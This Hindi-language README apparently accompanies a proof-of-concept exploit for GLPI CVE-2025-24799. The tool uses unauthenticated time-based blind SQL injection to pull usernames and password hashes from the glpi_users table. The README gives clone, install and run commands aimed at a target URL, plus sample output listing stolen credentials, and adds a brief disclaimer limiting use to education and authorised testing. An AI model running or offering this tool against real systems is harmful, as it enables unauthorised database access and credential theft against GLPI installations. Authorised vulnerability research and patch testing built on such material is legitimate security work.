
GLPI CVE-2025-24799 का बिना प्रमाणीकरण के time-based blind SQL injection के ज़रिए दोहन करता है, ताकि अधिकृत सुरक्षा परीक्षण हेतु glpi_users से उपयोगकर्ता नाम और पासवर्ड हैश निकाले जा सकें।
CVE-2025-24799 GLPI को लक्षित करने वाला एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है।
यह एक्सप्लॉइट उपयोगकर्ता क्रेडेंशियल निकालने के लिए बिना प्रमाणीकरण के SQL इंजेक्शन (टाइम-बेस्ड ब्लाइंड) का प्रदर्शन करता है।
अस्वीकरण: यह PoC केवल शैक्षिक उद्देश्यों के लिए है। बिना अनुमति के सिस्टम पर इसका उपयोग न करें।
glpi_users तालिका और आवश्यक कॉलम (name और password) का पता लगाता हैgit clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
आवश्यकताएँ:
requests,colorama,beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| Flag | विवरण | आवश्यक | डिफ़ॉल्ट |
|---|---|---|---|
-u, --url | लक्ष्य URL | हाँ | - |
कंसोल दिखाता है:
[•][✔][✖][i]उदाहरण:
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
मैं एक सक्रिय डेवलपर हूँ जो टूल बनाने और ज्ञान साझा करने का आनंद लेता है। आप मुझसे इन माध्यमों से संपर्क कर सकते हैं: